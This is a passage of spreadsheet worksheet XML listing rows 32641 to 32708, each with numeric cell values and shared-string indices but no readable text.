      <c r="B32641" s="2">
        <v>4.4740589E7</v>
      </c>
      <c r="C32641" s="2" t="s">
        <v>31414</v>
      </c>
      <c r="D32641" s="2">
        <v>1.0</v>
      </c>
      <c r="E32641" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32641" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32642" ht="15.75" customHeight="1">
      <c r="A32642" s="1">
        <v>5276.0</v>
      </c>
      <c r="B32642" s="2">
        <v>4.5159384E7</v>
      </c>
      <c r="C32642" s="2" t="s">
        <v>31415</v>
      </c>
      <c r="D32642" s="2">
        <v>1.0</v>
      </c>
      <c r="E32642" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32642" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32643" ht="15.75" customHeight="1">
      <c r="A32643" s="1">
        <v>5411.0</v>
      </c>
      <c r="B32643" s="2">
        <v>4.5524814E7</v>
      </c>
      <c r="C32643" s="2" t="s">
        <v>31416</v>
      </c>
      <c r="D32643" s="2">
        <v>1.0</v>
      </c>
      <c r="E32643" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32643" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32644" ht="15.75" customHeight="1">
      <c r="A32644" s="1">
        <v>5422.0</v>
      </c>
      <c r="B32644" s="2">
        <v>4.5561225E7</v>
      </c>
      <c r="C32644" s="2" t="s">
        <v>31417</v>
      </c>
      <c r="D32644" s="2">
        <v>1.0</v>
      </c>
      <c r="E32644" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32644" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32645" ht="15.75" customHeight="1">
      <c r="A32645" s="1">
        <v>5465.0</v>
      </c>
      <c r="B32645" s="2">
        <v>4.5666409E7</v>
      </c>
      <c r="C32645" s="2" t="s">
        <v>31418</v>
      </c>
      <c r="D32645" s="2">
        <v>1.0</v>
      </c>
      <c r="E32645" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32645" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32646" ht="15.75" customHeight="1">
      <c r="A32646" s="1">
        <v>5486.0</v>
      </c>
      <c r="B32646" s="2">
        <v>4.577119E7</v>
      </c>
      <c r="C32646" s="2" t="s">
        <v>31419</v>
      </c>
      <c r="D32646" s="2">
        <v>1.0</v>
      </c>
      <c r="E32646" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32646" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32647" ht="15.75" customHeight="1">
      <c r="A32647" s="1">
        <v>5767.0</v>
      </c>
      <c r="B32647" s="2">
        <v>4.6700936E7</v>
      </c>
      <c r="C32647" s="2" t="s">
        <v>31420</v>
      </c>
      <c r="D32647" s="2">
        <v>1.0</v>
      </c>
      <c r="E32647" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32647" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32648" ht="15.75" customHeight="1">
      <c r="A32648" s="1">
        <v>5905.0</v>
      </c>
      <c r="B32648" s="2">
        <v>4.7194006E7</v>
      </c>
      <c r="C32648" s="2" t="s">
        <v>31421</v>
      </c>
      <c r="D32648" s="2">
        <v>1.0</v>
      </c>
      <c r="E32648" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32648" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32649" ht="15.75" customHeight="1">
      <c r="A32649" s="1">
        <v>5914.0</v>
      </c>
      <c r="B32649" s="2">
        <v>4.720593E7</v>
      </c>
      <c r="C32649" s="2" t="s">
        <v>31422</v>
      </c>
      <c r="D32649" s="2">
        <v>1.0</v>
      </c>
      <c r="E32649" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32649" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32650" ht="15.75" customHeight="1">
      <c r="A32650" s="1">
        <v>5963.0</v>
      </c>
      <c r="B32650" s="2">
        <v>4.7327529E7</v>
      </c>
      <c r="C32650" s="2" t="s">
        <v>31423</v>
      </c>
      <c r="D32650" s="2">
        <v>1.0</v>
      </c>
      <c r="E32650" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32650" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32651" ht="15.75" customHeight="1">
      <c r="A32651" s="1">
        <v>5964.0</v>
      </c>
      <c r="B32651" s="2">
        <v>4.7329755E7</v>
      </c>
      <c r="C32651" s="2" t="s">
        <v>31424</v>
      </c>
      <c r="D32651" s="2">
        <v>1.0</v>
      </c>
      <c r="E32651" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32651" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32652" ht="15.75" customHeight="1">
      <c r="A32652" s="1">
        <v>5987.0</v>
      </c>
      <c r="B32652" s="2">
        <v>4.7410403E7</v>
      </c>
      <c r="C32652" s="2" t="s">
        <v>31425</v>
      </c>
      <c r="D32652" s="2">
        <v>1.0</v>
      </c>
      <c r="E32652" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32652" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32653" ht="15.75" customHeight="1">
      <c r="A32653" s="1">
        <v>6040.0</v>
      </c>
      <c r="B32653" s="2">
        <v>4.7588113E7</v>
      </c>
      <c r="C32653" s="2" t="s">
        <v>31426</v>
      </c>
      <c r="D32653" s="2">
        <v>1.0</v>
      </c>
      <c r="E32653" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32653" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32654" ht="15.75" customHeight="1">
      <c r="A32654" s="1">
        <v>6187.0</v>
      </c>
      <c r="B32654" s="2">
        <v>4.7908627E7</v>
      </c>
      <c r="C32654" s="2" t="s">
        <v>31427</v>
      </c>
      <c r="D32654" s="2">
        <v>1.0</v>
      </c>
      <c r="E32654" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32654" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32655" ht="15.75" customHeight="1">
      <c r="A32655" s="1">
        <v>6229.0</v>
      </c>
      <c r="B32655" s="2">
        <v>4.8052229E7</v>
      </c>
      <c r="C32655" s="2" t="s">
        <v>31428</v>
      </c>
      <c r="D32655" s="2">
        <v>1.0</v>
      </c>
      <c r="E32655" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32655" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32656" ht="15.75" customHeight="1">
      <c r="A32656" s="1">
        <v>6388.0</v>
      </c>
      <c r="B32656" s="2">
        <v>4.8444552E7</v>
      </c>
      <c r="C32656" s="2" t="s">
        <v>31429</v>
      </c>
      <c r="D32656" s="2">
        <v>1.0</v>
      </c>
      <c r="E32656" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32656" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32657" ht="15.75" customHeight="1">
      <c r="A32657" s="1">
        <v>6495.0</v>
      </c>
      <c r="B32657" s="2">
        <v>4.8699729E7</v>
      </c>
      <c r="C32657" s="2" t="s">
        <v>31430</v>
      </c>
      <c r="D32657" s="2">
        <v>1.0</v>
      </c>
      <c r="E32657" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32657" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32658" ht="15.75" customHeight="1">
      <c r="A32658" s="1">
        <v>6501.0</v>
      </c>
      <c r="B32658" s="2">
        <v>4.8713657E7</v>
      </c>
      <c r="C32658" s="2" t="s">
        <v>31431</v>
      </c>
      <c r="D32658" s="2">
        <v>1.0</v>
      </c>
      <c r="E32658" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32658" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32659" ht="15.75" customHeight="1">
      <c r="A32659" s="1">
        <v>6640.0</v>
      </c>
      <c r="B32659" s="2">
        <v>4.90738E7</v>
      </c>
      <c r="C32659" s="2" t="s">
        <v>31432</v>
      </c>
      <c r="D32659" s="2">
        <v>1.0</v>
      </c>
      <c r="E32659" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32659" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32660" ht="15.75" customHeight="1">
      <c r="A32660" s="1">
        <v>6820.0</v>
      </c>
      <c r="B32660" s="2">
        <v>4.9545491E7</v>
      </c>
      <c r="C32660" s="2" t="s">
        <v>31433</v>
      </c>
      <c r="D32660" s="2">
        <v>1.0</v>
      </c>
      <c r="E32660" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32660" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32661" ht="15.75" customHeight="1">
      <c r="A32661" s="1">
        <v>7019.0</v>
      </c>
      <c r="B32661" s="2">
        <v>5.0096984E7</v>
      </c>
      <c r="C32661" s="2" t="s">
        <v>31434</v>
      </c>
      <c r="D32661" s="2">
        <v>1.0</v>
      </c>
      <c r="E32661" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32661" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32662" ht="15.75" customHeight="1">
      <c r="A32662" s="1">
        <v>7163.0</v>
      </c>
      <c r="B32662" s="2">
        <v>5.0496424E7</v>
      </c>
      <c r="C32662" s="2" t="s">
        <v>31435</v>
      </c>
      <c r="D32662" s="2">
        <v>1.0</v>
      </c>
      <c r="E32662" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32662" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32663" ht="15.75" customHeight="1">
      <c r="A32663" s="1">
        <v>7205.0</v>
      </c>
      <c r="B32663" s="2">
        <v>5.0596052E7</v>
      </c>
      <c r="C32663" s="2" t="s">
        <v>31436</v>
      </c>
      <c r="D32663" s="2">
        <v>1.0</v>
      </c>
      <c r="E32663" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32663" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32664" ht="15.75" customHeight="1">
      <c r="A32664" s="1">
        <v>7338.0</v>
      </c>
      <c r="B32664" s="2">
        <v>5.094696E7</v>
      </c>
      <c r="C32664" s="2" t="s">
        <v>31437</v>
      </c>
      <c r="D32664" s="2">
        <v>1.0</v>
      </c>
      <c r="E32664" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32664" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32665" ht="15.75" customHeight="1">
      <c r="A32665" s="1">
        <v>7346.0</v>
      </c>
      <c r="B32665" s="2">
        <v>5.0979342E7</v>
      </c>
      <c r="C32665" s="2" t="s">
        <v>31438</v>
      </c>
      <c r="D32665" s="2">
        <v>1.0</v>
      </c>
      <c r="E32665" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32665" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32666" ht="15.75" customHeight="1">
      <c r="A32666" s="1">
        <v>7425.0</v>
      </c>
      <c r="B32666" s="2">
        <v>5.1160692E7</v>
      </c>
      <c r="C32666" s="2" t="s">
        <v>31439</v>
      </c>
      <c r="D32666" s="2">
        <v>1.0</v>
      </c>
      <c r="E32666" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32666" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32667" ht="15.75" customHeight="1">
      <c r="A32667" s="1">
        <v>7430.0</v>
      </c>
      <c r="B32667" s="2">
        <v>5.1180262E7</v>
      </c>
      <c r="C32667" s="2" t="s">
        <v>31440</v>
      </c>
      <c r="D32667" s="2">
        <v>1.0</v>
      </c>
      <c r="E32667" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32667" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32668" ht="15.75" customHeight="1">
      <c r="A32668" s="1">
        <v>7516.0</v>
      </c>
      <c r="B32668" s="2">
        <v>5.1411015E7</v>
      </c>
      <c r="C32668" s="2" t="s">
        <v>31441</v>
      </c>
      <c r="D32668" s="2">
        <v>1.0</v>
      </c>
      <c r="E32668" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32668" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32669" ht="15.75" customHeight="1">
      <c r="A32669" s="1">
        <v>7657.0</v>
      </c>
      <c r="B32669" s="2">
        <v>5.1798337E7</v>
      </c>
      <c r="C32669" s="2" t="s">
        <v>31442</v>
      </c>
      <c r="D32669" s="2">
        <v>1.0</v>
      </c>
      <c r="E32669" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32669" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32670" ht="15.75" customHeight="1">
      <c r="A32670" s="1">
        <v>7659.0</v>
      </c>
      <c r="B32670" s="2">
        <v>5.1798337E7</v>
      </c>
      <c r="C32670" s="2" t="s">
        <v>31443</v>
      </c>
      <c r="D32670" s="2">
        <v>1.0</v>
      </c>
      <c r="E32670" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32670" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32671" ht="15.75" customHeight="1">
      <c r="A32671" s="1">
        <v>7731.0</v>
      </c>
      <c r="B32671" s="2">
        <v>5.2034556E7</v>
      </c>
      <c r="C32671" s="2" t="s">
        <v>31444</v>
      </c>
      <c r="D32671" s="2">
        <v>1.0</v>
      </c>
      <c r="E32671" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32671" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32672" ht="15.75" customHeight="1">
      <c r="A32672" s="1">
        <v>7801.0</v>
      </c>
      <c r="B32672" s="2">
        <v>5.220815E7</v>
      </c>
      <c r="C32672" s="2" t="s">
        <v>31445</v>
      </c>
      <c r="D32672" s="2">
        <v>1.0</v>
      </c>
      <c r="E32672" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32672" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32673" ht="15.75" customHeight="1">
      <c r="A32673" s="1">
        <v>7933.0</v>
      </c>
      <c r="B32673" s="2">
        <v>5.2582309E7</v>
      </c>
      <c r="C32673" s="2" t="s">
        <v>31446</v>
      </c>
      <c r="D32673" s="2">
        <v>1.0</v>
      </c>
      <c r="E32673" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32673" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32674" ht="15.75" customHeight="1">
      <c r="A32674" s="1">
        <v>8123.0</v>
      </c>
      <c r="B32674" s="2">
        <v>5.3081925E7</v>
      </c>
      <c r="C32674" s="2" t="s">
        <v>31447</v>
      </c>
      <c r="D32674" s="2">
        <v>1.0</v>
      </c>
      <c r="E32674" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32674" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32675" ht="15.75" customHeight="1">
      <c r="A32675" s="1">
        <v>8160.0</v>
      </c>
      <c r="B32675" s="2">
        <v>5.3199056E7</v>
      </c>
      <c r="C32675" s="2" t="s">
        <v>31448</v>
      </c>
      <c r="D32675" s="2">
        <v>1.0</v>
      </c>
      <c r="E32675" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32675" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32676" ht="15.75" customHeight="1">
      <c r="A32676" s="1">
        <v>8264.0</v>
      </c>
      <c r="B32676" s="2">
        <v>5.3427902E7</v>
      </c>
      <c r="C32676" s="2" t="s">
        <v>31449</v>
      </c>
      <c r="D32676" s="2">
        <v>1.0</v>
      </c>
      <c r="E32676" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32676" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32677" ht="15.75" customHeight="1">
      <c r="A32677" s="1">
        <v>8317.0</v>
      </c>
      <c r="B32677" s="2">
        <v>5.3628554E7</v>
      </c>
      <c r="C32677" s="2" t="s">
        <v>31450</v>
      </c>
      <c r="D32677" s="2">
        <v>1.0</v>
      </c>
      <c r="E32677" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32677" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32678" ht="15.75" customHeight="1">
      <c r="A32678" s="1">
        <v>8347.0</v>
      </c>
      <c r="B32678" s="2">
        <v>5.373296E7</v>
      </c>
      <c r="C32678" s="2" t="s">
        <v>31451</v>
      </c>
      <c r="D32678" s="2">
        <v>1.0</v>
      </c>
      <c r="E32678" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32678" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32679" ht="15.75" customHeight="1">
      <c r="A32679" s="1">
        <v>8461.0</v>
      </c>
      <c r="B32679" s="2">
        <v>5.4003799E7</v>
      </c>
      <c r="C32679" s="2" t="s">
        <v>31452</v>
      </c>
      <c r="D32679" s="2">
        <v>1.0</v>
      </c>
      <c r="E32679" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32679" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32680" ht="15.75" customHeight="1">
      <c r="A32680" s="1">
        <v>8590.0</v>
      </c>
      <c r="B32680" s="2">
        <v>5.423283E7</v>
      </c>
      <c r="C32680" s="2" t="s">
        <v>31453</v>
      </c>
      <c r="D32680" s="2">
        <v>1.0</v>
      </c>
      <c r="E32680" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32680" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32681" ht="15.75" customHeight="1">
      <c r="A32681" s="1">
        <v>8705.0</v>
      </c>
      <c r="B32681" s="2">
        <v>5.4449612E7</v>
      </c>
      <c r="C32681" s="2" t="s">
        <v>31454</v>
      </c>
      <c r="D32681" s="2">
        <v>1.0</v>
      </c>
      <c r="E32681" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32681" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32682" ht="15.75" customHeight="1">
      <c r="A32682" s="1">
        <v>8744.0</v>
      </c>
      <c r="B32682" s="2">
        <v>5.4539693E7</v>
      </c>
      <c r="C32682" s="2" t="s">
        <v>31455</v>
      </c>
      <c r="D32682" s="2">
        <v>1.0</v>
      </c>
      <c r="E32682" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32682" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32683" ht="15.75" customHeight="1">
      <c r="A32683" s="1">
        <v>8802.0</v>
      </c>
      <c r="B32683" s="2">
        <v>5.4612686E7</v>
      </c>
      <c r="C32683" s="2" t="s">
        <v>31456</v>
      </c>
      <c r="D32683" s="2">
        <v>1.0</v>
      </c>
      <c r="E32683" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32683" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32684" ht="15.75" customHeight="1">
      <c r="A32684" s="1">
        <v>8813.0</v>
      </c>
      <c r="B32684" s="2">
        <v>5.4630451E7</v>
      </c>
      <c r="C32684" s="2" t="s">
        <v>31457</v>
      </c>
      <c r="D32684" s="2">
        <v>1.0</v>
      </c>
      <c r="E32684" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32684" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32685" ht="15.75" customHeight="1">
      <c r="A32685" s="1">
        <v>8925.0</v>
      </c>
      <c r="B32685" s="2">
        <v>5.483597E7</v>
      </c>
      <c r="C32685" s="2" t="s">
        <v>31458</v>
      </c>
      <c r="D32685" s="2">
        <v>1.0</v>
      </c>
      <c r="E32685" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32685" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32686" ht="15.75" customHeight="1">
      <c r="A32686" s="1">
        <v>8988.0</v>
      </c>
      <c r="B32686" s="2">
        <v>5.4962246E7</v>
      </c>
      <c r="C32686" s="2" t="s">
        <v>31459</v>
      </c>
      <c r="D32686" s="2">
        <v>1.0</v>
      </c>
      <c r="E32686" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32686" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32687" ht="15.75" customHeight="1">
      <c r="A32687" s="1">
        <v>9025.0</v>
      </c>
      <c r="B32687" s="2">
        <v>5.5019316E7</v>
      </c>
      <c r="C32687" s="2" t="s">
        <v>31460</v>
      </c>
      <c r="D32687" s="2">
        <v>1.0</v>
      </c>
      <c r="E32687" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32687" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32688" ht="15.75" customHeight="1">
      <c r="A32688" s="1">
        <v>9055.0</v>
      </c>
      <c r="B32688" s="2">
        <v>5.5091101E7</v>
      </c>
      <c r="C32688" s="2" t="s">
        <v>31461</v>
      </c>
      <c r="D32688" s="2">
        <v>1.0</v>
      </c>
      <c r="E32688" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32688" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32689" ht="15.75" customHeight="1">
      <c r="A32689" s="1">
        <v>9392.0</v>
      </c>
      <c r="B32689" s="2">
        <v>5.5743421E7</v>
      </c>
      <c r="C32689" s="2" t="s">
        <v>31462</v>
      </c>
      <c r="D32689" s="2">
        <v>1.0</v>
      </c>
      <c r="E32689" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32689" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32690" ht="15.75" customHeight="1">
      <c r="A32690" s="1">
        <v>9411.0</v>
      </c>
      <c r="B32690" s="2">
        <v>5.5777698E7</v>
      </c>
      <c r="C32690" s="2" t="s">
        <v>31463</v>
      </c>
      <c r="D32690" s="2">
        <v>1.0</v>
      </c>
      <c r="E32690" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32690" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32691" ht="15.75" customHeight="1">
      <c r="A32691" s="1">
        <v>9492.0</v>
      </c>
      <c r="B32691" s="2">
        <v>5.5917992E7</v>
      </c>
      <c r="C32691" s="2" t="s">
        <v>31464</v>
      </c>
      <c r="D32691" s="2">
        <v>1.0</v>
      </c>
      <c r="E32691" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32691" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32692" ht="15.75" customHeight="1">
      <c r="A32692" s="1">
        <v>9541.0</v>
      </c>
      <c r="B32692" s="2">
        <v>5.6023128E7</v>
      </c>
      <c r="C32692" s="2" t="s">
        <v>31465</v>
      </c>
      <c r="D32692" s="2">
        <v>1.0</v>
      </c>
      <c r="E32692" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32692" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32693" ht="15.75" customHeight="1">
      <c r="A32693" s="1">
        <v>9578.0</v>
      </c>
      <c r="B32693" s="2">
        <v>5.6077062E7</v>
      </c>
      <c r="C32693" s="2" t="s">
        <v>31466</v>
      </c>
      <c r="D32693" s="2">
        <v>1.0</v>
      </c>
      <c r="E32693" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32693" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32694" ht="15.75" customHeight="1">
      <c r="A32694" s="1">
        <v>9696.0</v>
      </c>
      <c r="B32694" s="2">
        <v>5.6367659E7</v>
      </c>
      <c r="C32694" s="2" t="s">
        <v>31467</v>
      </c>
      <c r="D32694" s="2">
        <v>1.0</v>
      </c>
      <c r="E32694" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32694" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32695" ht="15.75" customHeight="1">
      <c r="A32695" s="1">
        <v>9770.0</v>
      </c>
      <c r="B32695" s="2">
        <v>5.650134E7</v>
      </c>
      <c r="C32695" s="2" t="s">
        <v>31468</v>
      </c>
      <c r="D32695" s="2">
        <v>1.0</v>
      </c>
      <c r="E32695" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32695" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32696" ht="15.75" customHeight="1">
      <c r="A32696" s="1">
        <v>9771.0</v>
      </c>
      <c r="B32696" s="2">
        <v>5.650134E7</v>
      </c>
      <c r="C32696" s="2" t="s">
        <v>31469</v>
      </c>
      <c r="D32696" s="2">
        <v>1.0</v>
      </c>
      <c r="E32696" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32696" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32697" ht="15.75" customHeight="1">
      <c r="A32697" s="1">
        <v>9833.0</v>
      </c>
      <c r="B32697" s="2">
        <v>5.6641178E7</v>
      </c>
      <c r="C32697" s="2" t="s">
        <v>31470</v>
      </c>
      <c r="D32697" s="2">
        <v>1.0</v>
      </c>
      <c r="E32697" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32697" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32698" ht="15.75" customHeight="1">
      <c r="A32698" s="1">
        <v>9839.0</v>
      </c>
      <c r="B32698" s="2">
        <v>5.666164E7</v>
      </c>
      <c r="C32698" s="2" t="s">
        <v>31471</v>
      </c>
      <c r="D32698" s="2">
        <v>1.0</v>
      </c>
      <c r="E32698" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32698" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32699" ht="15.75" customHeight="1">
      <c r="A32699" s="1">
        <v>9842.0</v>
      </c>
      <c r="B32699" s="2">
        <v>5.666673E7</v>
      </c>
      <c r="C32699" s="2" t="s">
        <v>31472</v>
      </c>
      <c r="D32699" s="2">
        <v>1.0</v>
      </c>
      <c r="E32699" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32699" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32700" ht="15.75" customHeight="1">
      <c r="A32700" s="1">
        <v>9865.0</v>
      </c>
      <c r="B32700" s="2">
        <v>5.6725053E7</v>
      </c>
      <c r="C32700" s="2" t="s">
        <v>31473</v>
      </c>
      <c r="D32700" s="2">
        <v>1.0</v>
      </c>
      <c r="E32700" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32700" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32701" ht="15.75" customHeight="1">
      <c r="A32701" s="1">
        <v>9923.0</v>
      </c>
      <c r="B32701" s="2">
        <v>5.6818173E7</v>
      </c>
      <c r="C32701" s="2" t="s">
        <v>31474</v>
      </c>
      <c r="D32701" s="2">
        <v>1.0</v>
      </c>
      <c r="E32701" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32701" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32702" ht="15.75" customHeight="1">
      <c r="A32702" s="1">
        <v>10044.0</v>
      </c>
      <c r="B32702" s="2">
        <v>5.7100364E7</v>
      </c>
      <c r="C32702" s="2" t="s">
        <v>31475</v>
      </c>
      <c r="D32702" s="2">
        <v>1.0</v>
      </c>
      <c r="E32702" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32702" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32703" ht="15.75" customHeight="1">
      <c r="A32703" s="1">
        <v>10104.0</v>
      </c>
      <c r="B32703" s="2">
        <v>5.7227274E7</v>
      </c>
      <c r="C32703" s="2" t="s">
        <v>31476</v>
      </c>
      <c r="D32703" s="2">
        <v>1.0</v>
      </c>
      <c r="E32703" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32703" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32704" ht="15.75" customHeight="1">
      <c r="A32704" s="1">
        <v>10117.0</v>
      </c>
      <c r="B32704" s="2">
        <v>5.7253379E7</v>
      </c>
      <c r="C32704" s="2" t="s">
        <v>31477</v>
      </c>
      <c r="D32704" s="2">
        <v>1.0</v>
      </c>
      <c r="E32704" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32704" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32705" ht="15.75" customHeight="1">
      <c r="A32705" s="1">
        <v>10277.0</v>
      </c>
      <c r="B32705" s="2">
        <v>5.7624632E7</v>
      </c>
      <c r="C32705" s="2" t="s">
        <v>31478</v>
      </c>
      <c r="D32705" s="2">
        <v>1.0</v>
      </c>
      <c r="E32705" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32705" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32706" ht="15.75" customHeight="1">
      <c r="A32706" s="1">
        <v>10299.0</v>
      </c>
      <c r="B32706" s="2">
        <v>5.7659983E7</v>
      </c>
      <c r="C32706" s="2" t="s">
        <v>31479</v>
      </c>
      <c r="D32706" s="2">
        <v>1.0</v>
      </c>
      <c r="E32706" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32706" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32707" ht="15.75" customHeight="1">
      <c r="A32707" s="1">
        <v>10342.0</v>
      </c>
      <c r="B32707" s="2">
        <v>5.7732422E7</v>
      </c>
      <c r="C32707" s="2" t="s">
        <v>31480</v>
      </c>
      <c r="D32707" s="2">
        <v>1.0</v>
      </c>
      <c r="E32707" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32707" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32708" ht="15.75" customHeight="1">
      <c r="A32708" s="1">
        <v>10343.0</v>
      </c>
